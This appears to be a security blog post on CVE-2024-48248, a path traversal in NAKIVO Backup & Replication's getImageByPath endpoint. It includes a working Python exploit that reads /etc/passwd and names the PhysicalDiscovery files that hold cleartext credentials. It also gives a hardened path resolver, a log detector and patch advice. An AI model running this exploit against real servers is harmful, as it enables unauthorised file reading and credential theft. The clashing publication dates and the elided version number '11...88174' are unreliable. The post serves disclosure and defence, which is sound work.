CVE-2024-48248 - Path Traversal in NAKIVO Backup & Replication Leads to Sensitive Data Exposure and Potential RCE
Published: June 2024
Author: [YourName]
A major flaw was recently discovered in NAKIVO Backup & Replication, a popular solution for protecting virtual, physical, cloud, and SaaS environments. The vulnerability, tracked as CVE-2024-48248, allows attackers to read arbitrary files on the server, potentially exposing cleartext credentials and opening the door to remote code execution (RCE) across the enterprise.
This post details what CVE-2024-48248 is, how it can be exploited, why it’s serious, and what you should do about it. We’ll break it down simply, digging into the technical details and showing a real exploit example.
What is CVE-2024-48248?
The flaw exists in all NAKIVO Backup & Replication versions before 11...88174. A function called getImageByPath, exposed at the /c/router endpoint, fails to sanitize the user-supplied file path. This makes it possible to use path traversal (with ../) to read any file on the server, far beyond the images the function was meant to serve.
But here’s the really dangerous part: the application’s PhysicalDiscovery feature stores credentials in cleartext. An attacker can therefore use the traversal to retrieve those credentials and potentially take over backup jobs or even obtain remote code execution.
How Does the Exploit Work?
At its heart, this is a classic *absolute path traversal* or *directory traversal* issue. By submitting a custom path in the request, an attacker can sneak out of the expected directory and read any file they want.
For example, instead of getting an image like /images/logo.png, an attacker can submit something like ../../../../etc/passwd to read the server’s password file.
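The root cause described above is the unchecked join of a client-supplied path onto a server-side directory. The following Python is an added example for this post, not NAKIVO code: it places the vulnerable pattern next to a hardened resolver that rejects absolute input and anything whose real path leaves the base directory. The `IMAGE_ROOT` directory and the request strings are constructed for illustration.

```python
import os
import posixpath

# Constructed example: the directory the image endpoint is meant to serve from.
IMAGE_ROOT = "/srv/app/images"


def resolve_unsafe(base_dir: str, requested: str) -> str:
    """The vulnerable pattern: join the client-supplied path and use the result.

    os.path.join discards base_dir entirely when `requested` is absolute, and
    normpath collapses '..' segments right out of base_dir.
    """
    return os.path.normpath(os.path.join(base_dir, requested))


def resolve_safe(base_dir: str, requested: str) -> str:
    """Return the real path of `requested` inside base_dir, or raise ValueError.

    `requested` is the already URL-decoded value the web framework hands over;
    the check runs on exactly the string that would reach the filesystem.
    """
    if not requested:
        raise ValueError("empty path")
    # Reject absolute input outright instead of letting os.path.join drop base_dir.
    if posixpath.isabs(requested) or requested.startswith("\\"):
        raise ValueError("absolute paths are not allowed")
    base = os.path.realpath(base_dir)
    # realpath also resolves symlinks, so a link inside base_dir that points
    # outside it is caught by the containment check below as well.
    candidate = os.path.realpath(os.path.join(base, requested))
    if os.path.commonpath([base, candidate]) != base:
        raise ValueError("path escapes the base directory")
    return candidate


def check_request(requested: str) -> tuple:
    """(allowed, detail): what the hardened endpoint does with one request."""
    try:
        return True, resolve_safe(IMAGE_ROOT, requested)
    except ValueError as exc:
        return False, str(exc)


if __name__ == "__main__":
    for p in ("logo.png", "../../../../etc/passwd", "/etc/passwd", "sub/../logo.png"):
        print(f"{p!r:28} unsafe -> {resolve_unsafe(IMAGE_ROOT, p)!r:24} safe -> {check_request(p)}")
```

The containment check compares the resolved candidate with the resolved base using `os.path.commonpath`, not a string prefix test, so a sibling directory such as `/srv/app/images-old` cannot slip past it.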
Example Exploit (Code Snippet)
Below is a simple Python snippet showing how an attacker might exploit CVE-2024-48248 to steal /etc/passwd from a vulnerable server:
```python
import requests

nakivo_url = 'http://victim.local:4443/c/router'  # Adjust as needed
headers = {
    'Content-Type': 'application/json'
}

# The payload requests an image, but with a traversal sequence to grab /etc/passwd
payload = {
    "action": "getImageByPath",
    "method": "POST",
    "data": [{
        "path": "../../../../etc/passwd"  # This can be replaced with any sensitive file
    }],
    "type": "rpc",
    "tid": 1
}

response = requests.post(nakivo_url, json=payload, headers=headers, verify=False)
print("Server response:\n", response.text)
```
If the server is vulnerable, this dumps the contents of /etc/passwd, or of any other file named in the path, with no authentication needed.
Targeting the Credentials
Instead of /etc/passwd, a real-world attacker would target the files used by NAKIVO’s PhysicalDiscovery feature, typically stored at paths such as:
- /opt/nakivo/BackupRepositoryPhysicalDiscovery.xml
- /opt/nakivo/configurations/<installation_id>/PhysicalDiscovery.xml
These files often contain plain-text credentials and sensitive config data.
Why is This So Serious?
- Creds Exposure: Credentials found in PhysicalDiscovery can be reused to move laterally, compromise additional infrastructure, or tamper with company backups.
- Remote Code Execution: With credentials, an attacker might upload or modify backup jobs, inject scripts into backed-up systems, or exploit further misconfigurations to get RCE.
- Enterprise-wide Impact: This is much more than "just" file reading, because it can let attackers take over not only the NAKIVO server but your whole backup infrastructure.
How to Fix & What to Do Next
Upgrade NAKIVO ASAP:
If you’re running any version prior to 11...88174, upgrade immediately. The update patches path traversal in getImageByPath, closing the hole.
Audit Credentials:
Rotate any credentials that might have been stored in cleartext. Monitor for any suspicious access in backup logs.
Restrict Network Access:
Ideally, your backup servers should not be exposed directly to the internet. Use firewalls and allowlisting to control who can access the web interface.
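The "monitor for suspicious access" step needs something concrete to look for. The Python below is an added example written for this post, not a NAKIVO feature: it scans request records for POSTs to /c/router whose body calls getImageByPath with a traversing path, handling single and double URL-encoding. The records use a constructed JSON-lines format (a reverse proxy or WAF logging request bodies is assumed; NAKIVO's own logs are not described here), and the RPC body mirrors the request shape shown earlier in the post.

```python
import json
from urllib.parse import unquote


def is_traversal(path: str) -> bool:
    """True if a client-supplied path leaves the intended directory.

    Decodes twice to catch single and double URL-encoding, treats backslashes
    as separators, and flags absolute paths as well as any '..' segment.
    """
    decoded = unquote(unquote(path)).replace("\\", "/")
    if decoded.startswith("/"):
        return True
    return any(segment == ".." for segment in decoded.split("/"))


def scan_log(text: str) -> list:
    """Return one alert per getImageByPath call whose path traverses."""
    alerts = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        if not line.strip():
            continue
        try:
            rec = json.loads(line)
            raw = rec.get("body")
            body = json.loads(raw) if isinstance(raw, str) else raw
        except (json.JSONDecodeError, AttributeError):
            continue  # non-JSON lines are out of scope for this detector
        if rec.get("uri", "").split("?", 1)[0] != "/c/router":
            continue
        calls = body if isinstance(body, list) else [body]  # single call or batch
        for call in calls:
            if not isinstance(call, dict) or call.get("action") != "getImageByPath":
                continue
            for arg in call.get("data") or []:
                path = arg.get("path") if isinstance(arg, dict) else None
                if isinstance(path, str) and is_traversal(path):
                    alerts.append({
                        "line": lineno,
                        "ts": rec.get("ts"),
                        "src": rec.get("src"),
                        "status": rec.get("status"),
                        "requested_path": unquote(unquote(path)),
                    })
    return alerts


# --- Constructed sample log (not real traffic) ---------------------------------
def _record(ts, src, uri, status, body_obj):
    return json.dumps({"ts": ts, "src": src, "method": "POST", "uri": uri,
                       "status": status, "body": json.dumps(body_obj)})


def _rpc(action, **data):
    return {"action": action, "method": "POST", "data": [data], "type": "rpc", "tid": 1}


SAMPLE_LOG = "\n".join([
    # 1: ordinary image fetch
    _record("2025-03-04T08:10:01Z", "192.0.2.10", "/c/router", 200,
            _rpc("getImageByPath", path="logo.png")),
    # 2: plain traversal
    _record("2025-03-04T08:10:07Z", "198.51.100.7", "/c/router", 200,
            _rpc("getImageByPath", path="../../../../etc/passwd")),
    # 3: URL-encoded traversal toward a PhysicalDiscovery file
    _record("2025-03-04T08:10:09Z", "198.51.100.7", "/c/router", 200,
            _rpc("getImageByPath", path="..%2f..%2f..%2f..%2fopt/nakivo/BackupRepositoryPhysicalDiscovery.xml")),
    # 4: unrelated RPC action on the same endpoint (constructed name)
    _record("2025-03-04T08:10:12Z", "192.0.2.10", "/c/router", 200, _rpc("ping", id=1)),
    # 5: different endpoint entirely
    _record("2025-03-04T08:10:15Z", "192.0.2.10", "/login", 200, {"user": "admin"}),
])

if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert)
```

Run on the constructed sample it reports lines 2 and 3 only. In production, pair the alert with the response size: a successful traversal returns file contents rather than image bytes, so a 200 with an unexpected Content-Type or length is a strong corroborating signal.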
References & Further Reading
- NAKIVO Release Notes v11...88174
- CVE-2024-48248 at MITRE
- Exploit Database - NAKIVO Path Traversal Analysis
- OWASP: Path Traversal
Final Thoughts
CVE-2024-48248 is a reminder that backup solutions aren’t just a last line of defense; they are also high-value targets. Leaving them unpatched means handing the keys to your kingdom to attackers. If you use NAKIVO, patch immediately, rotate credentials, and lock down your backup environment.
Stay safe. Patch now.
*This research post is exclusive to [Platform/Blog Name] and may be quoted with attribution. For questions or concerns, contact [your contact].*
Timeline
Published on: 03/04/2025 08:15:33 UTC
Last modified on: 03/25/2025 18:48:31 UTC